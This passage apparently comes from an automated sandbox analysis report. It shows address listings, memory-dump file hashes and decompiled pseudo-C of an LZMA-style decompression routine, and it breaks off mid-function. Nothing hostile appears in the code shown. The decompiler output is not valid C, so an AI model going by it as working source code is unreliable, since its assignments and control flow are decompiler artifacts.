                                                                                                                          0x00406637
                                                                                                                          0x0040663a
                                                                                                                          0x00406670
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a0
                                                                                                                          0x004067a3
                                                                                                                          0x004067a3
                                                                                                                          0x004067a6
                                                                                                                          0x004067a8
                                                                                                                          0x00406a32
                                                                                                                          0x00000000
                                                                                                                          0x00406a32
                                                                                                                          0x004067ae
                                                                                                                          0x004067b1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067b7
                                                                                                                          0x004067bb
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x004067be
                                                                                                                          0x00000000
                                                                                                                          0x004067be
                                                                                                                          0x0040663c
                                                                                                                          0x0040663e
                                                                                                                          0x00406640
                                                                                                                          0x00406642
                                                                                                                          0x00406645
                                                                                                                          0x00406646
                                                                                                                          0x00406648
                                                                                                                          0x0040664a
                                                                                                                          0x0040664d
                                                                                                                          0x00406650
                                                                                                                          0x00406666
                                                                                                                          0x0040666b
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x004066d3
                                                                                                                          0x004066d5
                                                                                                                          0x004066dc
                                                                                                                          0x004066df
                                                                                                                          0x004066e2
                                                                                                                          0x004066e2
                                                                                                                          0x004066e7
                                                                                                                          0x004066e7
                                                                                                                          0x004066e9
                                                                                                                          0x004066ec
                                                                                                                          0x004066f3
                                                                                                                          0x004066f6
                                                                                                                          0x00406723
                                                                                                                          0x00406723
                                                                                                                          0x00406726
                                                                                                                          0x00406729
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x0040679d
                                                                                                                          0x00000000
                                                                                                                          0x0040679d
                                                                                                                          0x0040672b
                                                                                                                          0x00406731
                                                                                                                          0x00406734
                                                                                                                          0x00406737
                                                                                                                          0x0040673a
                                                                                                                          0x0040673d
                                                                                                                          0x00406740
                                                                                                                          0x00406743
                                                                                                                          0x00406746
                                                                                                                          0x00406749
                                                                                                                          0x0040674c
                                                                                                                          0x00406765
                                                                                                                          0x00406767
                                                                                                                          0x0040676a
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406773
                                                                                                                          0x00406775
                                                                                                                          0x00406777
                                                                                                                          0x0040677a
                                                                                                                          0x0040677c
                                                                                                                          0x0040677f
                                                                                                                          0x00406783
                                                                                                                          0x00406785
                                                                                                                          0x00406785
                                                                                                                          0x00406786
                                                                                                                          0x00406789
                                                                                                                          0x0040678c
                                                                                                                          0x0040674e
                                                                                                                          0x0040674e
                                                                                                                          0x00406756
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00406760
                                                                                                                          0x0040678f
                                                                                                                          0x00406796
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00406720
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00000000
                                                                                                                          0x00406798
                                                                                                                          0x00406796
                                                                                                                          0x004066a9
                                                                                                                          0x004066ac
                                                                                                                          0x004066ae
                                                                                                                          0x004066b1
                                                                                                                          0x004066b4
                                                                                                                          0x004066b7
                                                                                                                          0x004066b9
                                                                                                                          0x004066bc
                                                                                                                          0x004066bf
                                                                                                                          0x004066bf
                                                                                                                          0x004066c2
                                                                                                                          0x004066c2
                                                                                                                          0x004066c5
                                                                                                                          0x004066cc
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x004066a0
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x00000000
                                                                                                                          0x004066ce
                                                                                                                          0x004066cc
                                                                                                                          0x00406652
                                                                                                                          0x00406655
                                                                                                                          0x00406657
                                                                                                                          0x0040665a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063b9
                                                                                                                          0x004063b9
                                                                                                                          0x004063bd
                                                                                                                          0x00406a02
                                                                                                                          0x00000000
                                                                                                                          0x00406a02
                                                                                                                          0x004063c3
                                                                                                                          0x004063c6
                                                                                                                          0x004063c9
                                                                                                                          0x004063cc
                                                                                                                          0x004063cf
                                                                                                                          0x004063d2
                                                                                                                          0x004063d5
                                                                                                                          0x004063d7
                                                                                                                          0x004063da
                                                                                                                          0x004063dd
                                                                                                                          0x004063e0
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x004063e2
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c1
                                                                                                                          0x004067c5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004067cb
                                                                                                                          0x004067ce
                                                                                                                          0x004067d1
                                                                                                                          0x004067d4
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d6
                                                                                                                          0x004067d9
                                                                                                                          0x004067dc
                                                                                                                          0x004067df
                                                                                                                          0x004067e2
                                                                                                                          0x004067e5
                                                                                                                          0x004067e8
                                                                                                                          0x004067e9
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f1
                                                                                                                          0x004067f4
                                                                                                                          0x004067f7
                                                                                                                          0x004067fa
                                                                                                                          0x004067fe
                                                                                                                          0x00406800
                                                                                                                          0x00406803
                                                                                                                          0x00000000
                                                                                                                          0x00406805
                                                                                                                          0x00000000
                                                                                                                          0x00406805
                                                                                                                          0x00406803
                                                                                                                          0x00406a38
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406067

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.334395648.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.334384072.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334406689.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334414333.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334427655.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334432397.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000000.00000002.334438708.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                                                                                          • Instruction ID: 178f069459afe4b8f6f8f854f87fc4d5347ab2ec506c5a0858b6a976d85c5aaa
                                                                                                                          • Opcode Fuzzy Hash: 7dec09a748792e581ac56a4790c1b6395b646ad41e7ca9f7da80e9268b46833e
                                                                                                                          • Instruction Fuzzy Hash: 8E816871E00228CFDF24DFA8C8447ADBBB1FB45301F25816AD816BB281C7785A96DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406025, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406025(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
